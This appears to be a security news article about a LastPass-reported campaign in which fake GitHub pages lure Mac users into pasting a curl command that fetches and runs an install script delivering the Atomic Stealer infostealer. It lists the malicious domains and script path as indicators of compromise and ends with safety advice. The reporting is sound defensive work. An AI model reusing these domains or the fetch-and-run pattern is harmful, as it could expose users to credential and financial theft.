Cybersecurity researchers are warning Mac users about a malware campaign on GitHub. Attackers impersonate trusted companies, using fraudulent pages to distribute an infostealer that puts financial and personal data at risk.
The warning originates from LastPass Threat Intelligence, Mitigation, and Escalation (TIME) analysts. They first identified two fraudulent GitHub pages on September 16, 2025, under the username “modhopmduck476,” which purported to offer LastPass for Mac software. While these specific pages have been removed, the activity points to a broader, evolving campaign.
The attack chain is initiated when a user clicks a link labeled “Install LastPass on MacBook.” This triggers a redirect to hxxps://ahoastock825.github.io/.github/lastpass, followed by another to macprograms-pro.com/mac-git-2-download.html. On this final page, users are instructed to paste a command into their Mac’s terminal. The command uses a CURL request to fetch a base64-encoded URL, which decodes to bonoud.com/get3/install.sh. This script downloads an “Update” payload, installing malware into the system’s Temp directory.
The malware payload is Atomic Stealer (AMOS), an infostealer active since April 2023 and used by financially motivated cybercriminals. This campaign extends beyond a single brand, with investigators linking it to fake repositories impersonating companies such as 1Password, Robinhood, Citibank, Docker, Shopify, and Basecamp. The primary objective is to steal sensitive user data, including credentials and financial information.
To enhance their reach and persistence, the attackers register multiple GitHub usernames to circumvent takedowns. They also employ Search Engine Optimization (SEO) to manipulate Google and Bing search results. This technique pushes the malicious links to a higher rank, increasing the probability that users searching for legitimate software will be directed to the fraudulent pages instead of official download sites.
LastPass stated it is “actively monitoring” the campaign, working on takedowns, and sharing indicators of compromise to help other organizations detect the threat. The attackers’ method highlights how quickly fraudulent repositories can be established on platforms like GitHub, taken down, and then recreated under new aliases. This cyclical activity poses a persistent protection challenge for such community-driven platforms.
Here are some recommended safety measures to mitigate these risks:
- Downloading software only from verified, official sources.
- Avoiding the execution of commands copied from unfamiliar websites.
- Keeping macOS and all installed software fully updated.
- Using antivirus software that provides ransomware protection.
- Enabling regular system backups for data recovery.
- Remaining skeptical of unexpected links, emails, and pop-ups.
- Monitoring official advisories from software vendors.
- Using strong, unique passwords combined with two-factor authentication.
